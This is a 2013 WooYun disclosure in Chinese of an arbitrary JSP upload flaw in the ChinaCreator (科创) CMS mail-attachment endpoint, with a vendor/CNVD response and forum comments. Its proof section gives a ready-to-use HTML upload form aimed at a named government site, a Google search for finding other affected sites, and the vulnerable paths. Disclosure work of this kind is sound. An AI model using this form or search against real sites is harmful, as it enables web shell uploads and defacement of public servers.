当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-023088

漏洞标题:科创CMS uploadImageFile_do.jsp页面文件上传漏洞

相关厂商:chinacreator.com

漏洞作者: 健宇

提交时间:2013-05-04 21:50

修复时间:2013-08-02 21:50

公开时间:2013-08-02 21:50

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-05-04: 细节已通知厂商并且等待厂商处理中
2013-05-07: 厂商已经确认,细节仅向厂商公开
2013-05-10: 细节向第三方安全合作伙伴开放
2013-07-01: 细节向核心白帽子及相关领域专家公开
2013-07-11: 细节向普通白帽子公开
2013-07-21: 细节向实习白帽子公开
2013-08-02: 细节向公众公开

简要描述:

科创CMS任意上传JSP可执行脚本文件漏洞,波及一大批厅级、市级政府网站。

详细说明:

之前把漏洞上报在了cnvd,应cnvd要求把该漏洞上报至wooyun来。

1.jpg

漏洞证明:

科创CMS上传0day存在位置
/creatorcms/comm_front/email/uploadImageFile_do.jsp
/comm_front/email/uploadImageFile_do.jsp
通过谷歌搜索关键字可以看到相关的政府网站
http://www.google.com.hk/search?hl=zh-Hans-HK&source=hp&q=comm_front%2Femail%2F&gbv=2&oq=comm_front%2Femail%2F&gs_l=heirloom-hp.12...15360.15360.0.16453.1.1.0.0.0.0.0.0..0.0...0.0..0.1c.govyZeEz1ZI

2.jpg


总共有26,500条结果,可以看到政府网站使用科创cms的还是很多的。漏洞文件出在信箱,比如某厅网站为厅长信箱,某局网站为局长信箱,在信箱有一个上传附件,是允许群众上传附件给领导们查看一些相关图片之类的,由于网站程序对上传过滤不严导致了存在可以上传任意文件的漏洞。
漏洞利用方法,本地构造表单,以湖南省农业厅网站做为示例

<form id="frmUpload" enctype="multipart/form-data" action="http://www.hnagri.gov.cn/comm_front/email/uploadImageFile_do.jsp" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>


通过保存以下代码为HTML文件可以选择任意JSP文件进行上传。

3.jpg


选择好文件点upload可以看到结果。

4.jpg


5.jpg


如图所示,就可以直接上传JSP文件,如果被黑客利用可以导致大规模的政府网站被恶意篡改、挂马。

修复方案:

对上传文件进行服务端验证,只允许上传JPG,GIF,BMP文件,而且大小写全部转换成小写,对0x00,分号冒号等特殊符号进行过滤。

版权声明:转载请注明来源 健宇@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-05-07 22:32

厂商回复:

CNVD确认并复现所述情况,并在互联网上多个实例上复现。根据测试结果,已通知湖南等多地分中心,要求分中心协助处置涉及本省的政府部门案例,根据白帽子提供的信息,对应用软件进行了特征提取,以备下次有漏洞时进行快速测试。
同时,已在此前尝试联系软件开发厂商,后续情况待8日查证后再反馈。
rank=8.97*1.1*1.5=14.800

最新状态:

暂无

漏洞评价:

评论

  1. 2013-05-04 21:58 | Worzm ( 路人 | 还没有发布任何漏洞 )

    健宇叫我们来加人气的.

  2. 2013-05-04 21:59 | Lmy ( 实习白帽子 | Rank:69 漏洞数:12 | 低调求发展)

    你还是发出来了,希望这个漏洞别公开,私信给这类的站长修复,发出来又要被轮....

  3. 2013-05-04 21:59 | 马杀鸡 ( 路人 | Rank:21 漏洞数:5 | 作为一匹勇敢的马,杀鸡是必不可少的)

    我也是来加人气的

  4. 2013-05-04 22:00 | z7y ( 实习白帽子 | Rank:57 漏洞数:9 | 关注技术与网络安全)

    健宇吩咐的事,我不敢说不,人气+!

  5. 2013-05-04 22:00 | 冉冉升起 ( 路人 | Rank:12 漏洞数:6 | ...)

    健宇叫我们来加人气的.

  6. 2013-05-04 22:00 | 健宇 ( 普通白帽子 | Rank:131 漏洞数:14 | tools kid)

    @Lmy 额,想领个证书。

  7. 2013-05-04 22:02 | Lmy ( 实习白帽子 | Rank:69 漏洞数:12 | 低调求发展)

    @健宇 这个想法不错。。

  8. 2013-05-04 22:03 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @Lmy 走乌云的新流程的

  9. 2013-05-04 22:04 | ner ( 路人 | Rank:28 漏洞数:4 )

    健宇叫我来加人气,我拉上和尚和众呢姑来捧场了

  10. 2013-05-04 22:06 | 法海 ( 路人 | Rank:26 漏洞数:5 | 许仙去哪了)

    求细节

  11. 2013-05-04 22:11 | 三十度 ( 路人 | Rank:0 漏洞数:1 | 本屌精通各种花式撸管,装逼32式炉火纯青。...)

    健宇叫我们来加人气的.

  12. 2013-05-05 00:11 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @法海 他不懂爱

  13. 2013-05-06 16:17 | 慕林 ( 路人 | Rank:16 漏洞数:1 | 好钻研, 爱安全)

    科创CMS, 官网是啥呢? 不会保密了吧?

  14. 2013-05-28 09:01 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @慕林 见过其它地方用这个

  15. 2013-08-02 23:32 | 紫林 ( 路人 | Rank:0 漏洞数:4 | 喜欢白帽子)

    上传后的路径在那?